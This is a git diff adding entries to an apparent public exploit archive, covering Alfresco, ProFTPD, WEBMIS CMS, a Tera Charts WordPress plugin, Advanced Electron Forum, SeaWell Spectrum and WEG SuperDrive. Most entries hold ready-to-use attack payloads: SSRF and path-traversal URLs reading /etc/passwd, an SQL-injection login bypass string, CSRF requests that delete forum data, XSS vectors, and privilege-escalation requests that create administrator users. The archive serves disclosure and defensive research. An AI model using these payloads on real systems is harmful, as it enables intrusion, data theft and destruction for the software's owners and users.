+Alfresco Community Edition 4.2.f and earlier are vulnerable. + +http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port \ No newline at end of file diff --git a/platforms/multiple/remote/39259.txt b/platforms/multiple/remote/39259.txt new file mode 100755 index 000000000..dacc05948 --- /dev/null +++ b/platforms/multiple/remote/39259.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/68http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info + +Alfresco Community Edition is prone to multiple security vulnerabilities. + +An attacker may leverage these issues to gain sensitive information or bypass certain security restrictions. + +Alfresco Community Edition 4.2.f and earlier are vulnerable. + +http://www.example.com/alfresco/cmisbrowser?url=http://internal_system:port \ No newline at end of file diff --git a/platforms/multiple/remote/8037.txt b/platforms/multiple/remote/8037.txt index 4525322dc..17614d563 100755 --- a/platforms/multiple/remote/8037.txt +++ b/platforms/multiple/remote/8037.txt @@ -1,17 +1,17 @@ -Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like: - -USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- - -and a password of "1" (without quotes). - -which leads to a successful login. Different account logins can be made successful using the limit clase (e.g appending "LIMIT 5,1" will make you login with as the 5th account in the users table). - -As far as I can see in the mysql logs the query becomes: - -SELECT userid, passwd, uid, gid, homedir, shell FROM users WHERE (userid='{UNKNOWN TAG}') and 1=2 union select 1,1,uid,gid,homedir,shell from users limit 1,1; -- ') LIMIT 1 - -I think the problem lies in the handling of the "%" character (probably that's some way to sanitize input to avoid format string things?). - -Anyway, %' effectively makes the single quote unescaped and that eventually allows for an SQL injection during login. - -# milw0rm.com [2009-02-10] +Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like: + +USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- + +and a password of "1" (without quotes). + +which leads to a successful login. Different account logins can be made successful using the limit clase (e.g appending "LIMIT 5,1" will make you login with as the 5th account in the users table). + +As far as I can see in the mysql logs the query becomes: + +SELECT userid, passwd, uid, gid, homedir, shell FROM users WHERE (userid='{UNKNOWN TAG}') and 1=2 union select 1,1,uid,gid,homedir,shell from users limit 1,1; -- ') LIMIT 1 + +I think the problem lies in the handling of the "%" character (probably that's some way to sanitize input to avoid format string things?). + +Anyway, %' effectively makes the single quote unescaped and that eventually allows for an SQL injection during login. + +# milw0rm.com [2009-02-10] diff --git a/platforms/php/webapps/39255.html b/platforms/php/webapps/39255.html new file mode 100755 index 000000000..f191b1847 --- /dev/null +++ b/platforms/php/webapps/39255.html @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/68658/info + +WEBMIS CMS is prone to a vulnerability that lets attackers upload arbitrary files. + +An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. + +
+ +
+ + + +
diff --git a/platforms/php/webapps/39256.txt b/platforms/php/webapps/39256.txt new file mode 100755 index 000000000..0b55ed8d3 --- /dev/null +++ b/platforms/php/webapps/39256.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/68662/info + +Tera Charts plugin for WordPress is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these issues to obtain potentially sensitive information; other attacks are also possible. + +Tera Charts 0.1 is vulnerable; other versions may also be affected. + +http://www.example.com/wordpress_vuln_check/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../../etc/passwd +http://www.example.com/wordpress_vuln_check/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/39257.txt b/platforms/php/webapps/39257.txt new file mode 100755 index 000000000..25e464ce3 --- /dev/null +++ b/platforms/php/webapps/39257.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/68662/info + +Tera Charts plugin for WordPress is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these issues to obtain potentially sensitive information; other attacks are also possible. + +Tera Charts 0.1 is vulnerable; other versions may also be affected. + +http://www.example.com/wp_test/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/39261.txt b/platforms/php/webapps/39261.txt new file mode 100755 index 000000000..24a02c3ba --- /dev/null +++ b/platforms/php/webapps/39261.txt @@ -0,0 +1,180 @@ +[+] Credits: hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-CSRF.txt + + +Vendor: +============================= +www.anelectron.com/downloads/ + + +Product: +==================================== +Advanced Electron Forum v1.0.9 (AEF) +Exploit patched current version. + + +Vulnerability Type: +=================== +CSRF + + +CVE Reference: +============== +N/A + + +Vulnerability Details: +===================== + +In Admin panel no CSRF protections exist in multiple areas allowing remote +attackers to make HTTP request on behalf of the victim if they +currently have a valid session (logged in) and visit or click an infected +link, resulting in some of the following destructions. + +0x01: Change current database settings + +0x02: Delete all Inbox / Sent Emails + +0x03: Delete all 'shouts' + +0x04: Delete all Topics + +by the way, edit profile, avatar and more all seem vulnerable as well.. + + +Exploit code(s): +=============== + +CSRF 0x01: + +change mysql db settings +note: however you will need to know or guess the database name. + +
+ + + + + + +
+ + +CSRF 0x02: + +Delete all Inbox / Sent emails... + + + +
+ + +
+ +
+ + +
+ + + + + +CSRF 0x03: + +Delete all 'Shouts' + +
+ + + + + + + +
+ + +CSRF 0x04: + +Delete all 'Topics' via simple GET request, this will delete topics 1 thru +7... + +http://localhost/AEF(1.0.9)_Install/index.php?act=deletetopic&topid=7,6,5,4,3,2,1 + + +Disclosure Timeline: +======================================= +Vendor Notification: NA +January 17, 2016 : Public Disclosure + + + +Exploitation Technique: +====================== +Remote + + +Severity Level: +================ +High + + +Description: +=================================================================== +Request Method(s): [+] POST / GET + + +Vulnerable Product: [+] AEF v1.0.9 (exploit patched version) + + +=================================================================== + +[+] Disclaimer +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and that due +credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit is given to +the author. +The author is not responsible for any misuse of the information contained +herein and prohibits any malicious use of all security related information +or exploits by the author or elsewhere. + +by hyp3rlinx diff --git a/platforms/php/webapps/39262.txt b/platforms/php/webapps/39262.txt new file mode 100755 index 000000000..9b29041c0 --- /dev/null +++ b/platforms/php/webapps/39262.txt @@ -0,0 +1,139 @@ +[+] Credits: hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-XSS.txt + + +Vendor: +============================= +www.anelectron.com/downloads/ + + +Product: +==================================== +Advanced Electron Forum v1.0.9 (AEF) +Exploit patched current version. + + +Vulnerability Type: +=================== +Persistent XSS + + +CVE Reference: +============== +N/A + + +Vulnerability Details: +===================== + +In Admin panel under Edit Boards / General Stuff / General Options + +There is an option to sepcify a redirect URL for the forum. + +See --> Redirect Forum: +Enter a URL to which this forum will be redirected to. + +The redirect input field is vulnerable to a persistent XSS that will be +stored in the MySQL database +and execute attacker supplied client side code each time a victim visits +the following URLs. + +http://localhost/AEF(1.0.9)_Install/index.php? + +http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=forums&seadact=editforum&editforum=1 + + + +Exploit code(s): +=============== + +Persistent XSS + +
+ + + + + + + + + + + + + + + + + + + + + +
+ + + +Some other misc XSS(s) under 'Signature' area. + + +http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=signature +on Anchor link setting +http://"onMouseMove="alert(0) + +AND + +http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=writepm +email link: +mailto:"onMouseMove="alert(1) + + + +Disclosure Timeline: +===================================== +Vendor Notification: NA +January 17, 2016 : Public Disclosure + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +================ +High + + +Description: +================================================================= + + +Request Method(s): [+] POST + + +Vulnerable Product: [+] AEF v1.0.9 (exploit patched version) + + +Vulnerable Parameter(s): [+] 'fredirect' + +================================================================= + +[+] Disclaimer +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and that due +credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit is given to +the author. +The author is not responsible for any misuse of the information contained +herein and prohibits any malicious use of all security related information +or exploits by the author or elsewhere. + +by hyp3rlinx diff --git a/platforms/php/webapps/39263.txt b/platforms/php/webapps/39263.txt new file mode 100755 index 000000000..14a5ec908 --- /dev/null +++ b/platforms/php/webapps/39263.txt @@ -0,0 +1,113 @@ +[+] Credits: hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-RFI.txt + + + +Vendor: +============================= +www.anelectron.com/downloads/ + + + +Product: +================================ +Advanced Electron Forum v1.0.9 (AEF) +Exploit patched current version. + + +Vulnerability Type: +============================ +Remote File Inclusion / CSRF + + + +CVE Reference: +============== +N/A + + + +Vulnerability Details: +===================== + +In Admin control panel there is option to Import Skins and one choice is +using a web URL. + +From AEF: + +"Specify the URL of the theme on the net. The theme file must be a +compressed archive (zip, tgz, tbz2, tar)." + +However there is no CSRF token or check made that this is a valid request +made by the currently logged in user, resulting +in arbitrary remote file imports from an attacker if the user visits or +clicks an malicious link. Victims will then be left +open to arbitrary malicious file downloads from anywhere on the net which +may be used as a platform for further attacks... + + + +Exploit code(s): +=============== + +
+ + + + + + + +
+ + + +Disclosure Timeline: +====================================== +Vendor Notification: NA +January 17, 2016 : Public Disclosure + + + +Exploitation Technique: +======================= +Remote + + + +Severity Level: +=============== +High + + + +Description: +================================================================== + + +Request Method(s): [+] POST + + +Vulnerable Product: [+] Advanced Electron Forum v1.0.9 (AEF) + + + +================================================================== + +[+] Disclaimer +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and that due +credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit is given to +the author. +The author is not responsible for any misuse of the information contained +herein and prohibits any malicious use of all security related information +or exploits by the author or elsewhere. + +by hyp3rlinx diff --git a/platforms/php/webapps/39266.txt b/platforms/php/webapps/39266.txt new file mode 100755 index 000000000..a6ca1ab4d --- /dev/null +++ b/platforms/php/webapps/39266.txt @@ -0,0 +1,105 @@ +# Exploit Title: [SeaWell Networks Spectrum - Multiple Vulnerabilities] +# Discovered by: Karn Ganeshen +# Vendor Homepage: [http://www.seawellnetworks.com/spectrum/] +# Versions Reported: [Spectrum SDC 02.05.00, Build 02.05.00.0016] + +CVE-ID: +CVE-2015-8282 +CVE-2015-8283 +CVE-2015-8284 + +About SeaWell Networks Spectrum + +Session Delivery Control + +SeaWell set out to improve the way operators control, monetize and scale their IP video offerings, to meet the growing subscriber demands for video delivered to smartphones, tablets and game consoles. + +The result – Spectrum – is what we call a “Multiscreen 2.0” Session Delivery Controller. + +Spectrum is high-performance, carrier-grade software that takes ABR video and repackages it – on-the-fly – into any other protocol, including Apple HLS, Adobe HDS, Microsoft Smooth Streaming and MPEG-DASH. + +http://www.seawellnetworks.com/spectrum/ + +Affected version +Spectrum SDC 02.05.00 +Build 02.05.00.0016 +Copyright (c) 2015 SeaWell Networks Inc. + +A. CWE-255: Credentials Management +CVE-2015-8282 + +Weak, default login credentials - admin / admin + +B. CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') +CVE-2015-8283 + +The configure_manage.php module accepts a file parameter which takes an unrestricted file path as input, allowing an attacker (non-admin, low- privileged user) to read arbitrary files on the system. + +PoC: + +https://IP/configure_manage.php?action=download_config&file=../../../../../../../../../etc/passwd + +C. CWE-285: Improper Authorization +CVE-2015-8284 + +A low privileged, non-admin user, with only viewer privileges, can perform administrative functions, such as create, update, delete a user (including admin user), or access device's configuration files (policy.xml, cookie_config.xml, systemCfg.xml). The application lacks Authorization controls to restrict any non-admin users from performing admin functions. + +The application users can have admin or viewer privilege levels. Admin has full access to the device. Viewer has access to very restricted functions. + +It is possible for a viewer priv user to perform admin functions. + +PoC: + +Add new user [Admin function only] + +GET /system_manage.php?username=viewer&password=viewer&password=viewer&userlevel=1&action=add_user&ekey=&LActiveRow= HTTP/1.1 + +https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow= + +Here + +admin -> userlevel=9 +viewer -> userlevel=1 + +Create new user with Admin privs +Log in as viewer - try create new admin user - viewer1 + +https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow= + +0Success1 + +Delete user + +https://IP/system_manage.php?username=viewer1&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4 + +Modify existing user (including admin) +log in as viewer - try change system (admin) user + +https://IP/system_manage.php?username=system&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4 + +0Success1 + +Change Admin password +log in as viewer - try change admin pass + +https://IP/system_manage.php?username=admin&password=admin1&password=admin1&userlevel=9&action=update_user&ekey=3&LActiveRow=sys_Luser_3 + +0Success1 + +Downloading configuration xml files + +viewer priv user has no access/option to config xmls via GUI. It is possible to download the configs by calling the url directly + +Access policy config xml +https://IP/configure_manage.php?action=download_config&file=policy.xml + +Access cookie config xml +https://IP/configure_manage.php?action=download_config&file=cookie_config.xml + +Access system config xml +https://IP/configure_manage.php?action=download_config&file=systemCfg.xml + ++++++ +-- +Best Regards, +Karn Ganeshen \ No newline at end of file diff --git a/platforms/windows/local/39260.txt b/platforms/windows/local/39260.txt new file mode 100755 index 000000000..8a3fea1ec --- /dev/null +++ b/platforms/windows/local/39260.txt @@ -0,0 +1,66 @@ + +WEG SuperDrive G2 v12.0.0 Insecure File Permissions + + +Vendor: WEG Group +Product web page: http://www.weg.net +Affected version: SuperDrive G2 (v12.0.0 Build 20150930-J1.8.0_60-NB8.0.2) + SuperDrive (v7.0.0) + +Summary: SuperDrive is a Windows graph tool for parameter setting, +control and monitor of WEG Drives. It permits to edit directly in the +drive online parameters, or to edit offline parameter files stored +in the microcomputer. It enables you to store parameters of all drives +that exist in the installation. The software also incorporates functions +enable the upload to the drive of the microcomputer parameters sets +as well as the download from the drive to the microcomputer. The +communication between drive and microcomputer is realized via RS232 +serial interface (point to point) or by RS485 for network linkage. + +Desc: SuperDrive suffers from an elevation of privileges vulnerability +which can be used by a simple authenticated user that can change the +executable file with a binary of choice. The vulnerability exist due +to the improper permissions, with the 'C' flag (Change) for 'Authenticated +Users' group. + +Tested on: Microsoft Windows 7 Ultimate SP1 (EN) + Microsoft Windows 7 Professional SP1 (EN) + Java 1.8.0_60 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5294 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5294.php + + +25.11.2015 + +-- + + +C:\WEG\SuperDrive 7.0.0>cacls SuperDrive.exe +C:\WEG\SuperDrive 7.0.0\SuperDrive.exe BUILTIN\Administrators:F + NT AUTHORITY\SYSTEM:F + BUILTIN\Users:R + NT AUTHORITY\Authenticated Users:C + + +C:\WEG\SuperDrive 7.0.0> + + +C:\WEG\SuperDrive G2 12.0.0>cacls *.exe +C:\WEG\SuperDrive G2 12.0.0\SuperDriveG2.exe BUILTIN\Administrators:F + NT AUTHORITY\SYSTEM:F + BUILTIN\Users:R + NT AUTHORITY\Authenticated Users:C + +C:\WEG\SuperDrive G2 12.0.0\unins000.exe BUILTIN\Administrators:F + NT AUTHORITY\SYSTEM:F + BUILTIN\Users:R + NT AUTHORITY\Authenticated Users:C + + +C:\WEG\SuperDrive G2 12.0.0>